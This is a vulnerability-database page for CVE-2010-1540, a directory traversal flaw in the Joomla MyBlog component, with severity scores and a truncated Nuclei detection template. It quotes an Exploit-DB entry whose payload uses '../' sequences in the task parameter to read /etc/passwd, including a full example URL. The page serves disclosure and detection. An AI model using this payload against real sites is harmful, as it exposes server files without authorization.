CVE-2010-1540
published 2010-04-26CVE-2010-1540: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a…
PriorityP335medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
8.23%
94.2th percentile
Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| myblog | com_myblog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component com_blog - Directory Traversal
exploitdb·2010-03-03
CVE-2010-1540 Joomla! Component com_blog - Directory Traversal
Joomla! Component com_blog - Directory Traversal
---
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_blog LFI Vulnerability
[~] Author : DevilZ TM By D3v1l
[~] Homepage : http://www.DEVILZTM.com
[~] Contact : [email protected] & [email protected]
[~]######################################### ExploiT #################################################[~]
[~] Vulnerable File :
http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=[LFI]
[~] ExploiT :
../../../../../../../../etc/passwd%00
[~] Example :
http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00
[~]######################################### ThankS To ... #########################
Nuclei
Joomla! Component com_blog - Directory Traversal
nuclei·CVSS 5.0
CVE-2010-1540 [MEDIUM] Joomla! Component com_blog - Directory Traversal
Joomla! Component com_blog - Directory Traversal
A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
Template:
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: medium
description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
impact: |
An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
remediation: |
Apply the latest security patches or updates provided by Joomla! t
No writeups or analysis indexed.
2010-04-26
Published